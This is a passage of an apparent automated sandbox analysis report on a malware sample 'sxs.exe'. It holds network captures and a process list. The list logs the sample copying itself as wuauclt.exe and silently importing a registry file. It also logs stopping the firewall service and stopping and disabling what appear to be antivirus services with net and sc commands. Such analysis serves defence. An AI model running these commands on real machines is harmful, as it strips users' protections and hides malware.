                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:29 UTC715INHTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-YyYlOUiY5HN28jS-3pT0eg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Thu, 29 Aug 2024 15:12:28 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.553802172.217.16.2064434040C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:29 UTC883OUTGET /afs/gen_204?client=dp-namemedia06_3ph&output=uds_ads_only&zx=2gf50ip8fgbm&aqid=1o_QZoOUFf6kjuwPko2JoA0&psid=7621175430&pbt=bv&adbx=267&adby=173.6875&adbh=464&adbw=500&adbah=148%2C148%2C148&adbn=master-1&eawp=partner-dp-namemedia06_3ph&errv=667606770&csala=11%7C0%7C1627%7C1343%7C1527&lle=0&ifv=1&hpt=0 HTTP/1.1
                                                                          Host: syndicatedsearch.goog
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: cross-site
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://www.onefordvd.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-08-29 15:12:29 UTC715INHTTP/1.1 204 No Content
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-94hu7QdMziR0HhiT7lwwlg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]}
                                                                          Permissions-Policy: unload=()
                                                                          Date: Thu, 29 Aug 2024 15:12:29 GMT
                                                                          Server: gws
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          39192.168.2.55379952.165.165.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:29 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-08-29 15:12:29 UTC560INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                          MS-CorrelationId: 96f2b0d4-2b77-4786-a3a1-b70bb3f5720d
                                                                          MS-RequestId: 8b9f3927-bad7-4aa5-976a-5e6f6b8d45f6
                                                                          MS-CV: /xFXqoNT1EyVkIkU.0
                                                                          X-Microsoft-SLSClientCache: 2880
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Thu, 29 Aug 2024 15:12:28 GMT
                                                                          Connection: close
                                                                          Content-Length: 24490
                                                                          2024-08-29 15:12:29 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                          2024-08-29 15:12:29 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          40192.168.2.55380823.1.237.91443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:12:31 UTC2148OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                          Origin: https://www.bing.com
                                                                          Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                          Accept: */*
                                                                          Accept-Language: en-CH
                                                                          Content-type: text/xml
                                                                          X-Agent-DeviceId: 01000A410900D492
                                                                          X-BM-CBT: 1696428841
                                                                          X-BM-DateFormat: dd/MM/yyyy
                                                                          X-BM-DeviceDimensions: 784x984
                                                                          X-BM-DeviceDimensionsLogical: 784x984
                                                                          X-BM-DeviceScale: 100
                                                                          X-BM-DTZ: 120
                                                                          X-BM-Market: CH
                                                                          X-BM-Theme: 000000;0078d7
                                                                          X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                          X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                          X-Device-isOptin: false
                                                                          X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                          X-Device-OSSKU: 48
                                                                          X-Device-Touch: false
                                                                          X-DeviceID: 01000A410900D492
                                                                          X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                          X-MSEdge-ExternalExpType: JointCoord
                                                                          X-PositionerType: Desktop
                                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                          X-Search-CortanaAvailableCapabilities: None
                                                                          X-Search-SafeSearch: Moderate
                                                                          X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                          X-UserAgeClass: Unknown
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                          Host: www.bing.com
                                                                          Content-Length: 2484
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1724944316710&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
                                                                          2024-08-29 15:12:31 UTC1OUTData Raw: 3c
                                                                          Data Ascii: <
                                                                          2024-08-29 15:12:31 UTC2483OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 33 36 34 34 46 44 37 34 44 46 31 36 36 31 38 46 30 38 46 37 45 43 30 33 44 45 35 35 36 30 30 31 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 37 35 32 32 38 31 35 36 37 30 33 41 34 30 44 35 42 39 37 45 35 41 36 38 33 36 46 32 41 31 43 45 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                          Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                          2024-08-29 15:12:32 UTC479INHTTP/1.1 204 No Content
                                                                          Access-Control-Allow-Origin: *
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          X-MSEdge-Ref: Ref A: 1B6A91BEEE0A4FCFB242068DD55538DC Ref B: LAX311000108047 Ref C: 2024-08-29T15:12:32Z
                                                                          Date: Thu, 29 Aug 2024 15:12:32 GMT
                                                                          Connection: close
                                                                          Alt-Svc: h3=":443"; ma=93600
                                                                          X-CDN-TraceID: 0.5fed0117.1724944351.b9bf028


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          41192.168.2.55380952.165.165.26443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-08-29 15:13:08 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=lFzGF6yeVbArfYs&MD=x6PWfleO HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept: */*
                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                          Host: slscr.update.microsoft.com
                                                                          2024-08-29 15:13:08 UTC560INHTTP/1.1 200 OK
                                                                          Cache-Control: no-cache
                                                                          Pragma: no-cache
                                                                          Content-Type: application/octet-stream
                                                                          Expires: -1
                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                          MS-CorrelationId: fe928793-74e9-4837-a24f-feb1d8894c36
                                                                          MS-RequestId: 31fd3a79-9780-4d1c-9351-13e9e3578374
                                                                          MS-CV: EPqUwqprNECCPIVO.0
                                                                          X-Microsoft-SLSClientCache: 1440
                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                          X-Content-Type-Options: nosniff
                                                                          Date: Thu, 29 Aug 2024 15:13:08 GMT
                                                                          Connection: close
                                                                          Content-Length: 30005
                                                                          2024-08-29 15:13:08 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                          2024-08-29 15:13:08 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Target ID:0
                                                                          Start time:11:12:08
                                                                          Start date:29/08/2024
                                                                          Path:C:\Users\user\Desktop\sxs.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\sxs.exe"
                                                                          Imagebase:0x400000
                                                                          File size:55'448 bytes
                                                                          MD5 hash:4F89E3A88853265154E24969581FB45A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:2
                                                                          Start time:11:12:09
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                          Wow64 process (32bit):
                                                                          Commandline:"C:\Program Files\Internet Explorer\iexplore.exe"
                                                                          Imagebase:
                                                                          File size:834'512 bytes
                                                                          MD5 hash:CFE2E6942AC1B72981B3105E22D3224E
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:3
                                                                          Start time:11:12:11
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\explorer.exe" http://www.onefordvd.com
                                                                          Imagebase:0x90000
                                                                          File size:4'514'184 bytes
                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:4
                                                                          Start time:11:12:11
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\wuauclt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\wuauclt.exe"
                                                                          Imagebase:0x400000
                                                                          File size:55'448 bytes
                                                                          MD5 hash:4F89E3A88853265154E24969581FB45A
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Avira
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 91%, ReversingLabs
                                                                          Reputation:low
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:5
                                                                          Start time:11:12:11
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:6
                                                                          Start time:11:12:12
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://www.onefordvd.com/
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:8
                                                                          Start time:11:12:12
                                                                          Start date:29/08/2024
                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2068,i,10012621105845313477,5144001626182359971,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                          Imagebase:0x7ff715980000
                                                                          File size:3'242'272 bytes
                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          General

                                                                          Target ID:9
                                                                          Start time:11:12:14
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\explorer.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\explorer.exe" http://www.onefordvd.com
                                                                          Imagebase:0x90000
                                                                          File size:4'514'184 bytes
                                                                          MD5 hash:DD6597597673F72E10C9DE7901FBA0A8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:10
                                                                          Start time:11:12:14
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\regedit.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\regedit.exe" /s C:\Windows\noruns.reg
                                                                          Imagebase:0x3c0000
                                                                          File size:329'728 bytes
                                                                          MD5 hash:BD63D72DB4FA96A1E0250B1D36B7A827
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:11
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop sharedaccess
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:12
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                          Imagebase:0x7ff674740000
                                                                          File size:5'141'208 bytes
                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:13
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop KVWSC
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:14
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:15
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:16
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config KVWSC start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:17
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\net.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\net.exe" stop KVSrvXP
                                                                          Imagebase:0x700000
                                                                          File size:47'104 bytes
                                                                          MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:18
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:19
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\System32\sc.exe" config KVSrvXP start= disabled
                                                                          Imagebase:0x710000
                                                                          File size:61'440 bytes
                                                                          MD5 hash:D9D7684B8431A0D10D0E76FE9F5FFEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:20
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:21
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6d64d0000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Has exited:true

                                                                          General

                                                                          Target ID:22
                                                                          Start time:11:12:15
                                                                          Start date:29/08/2024
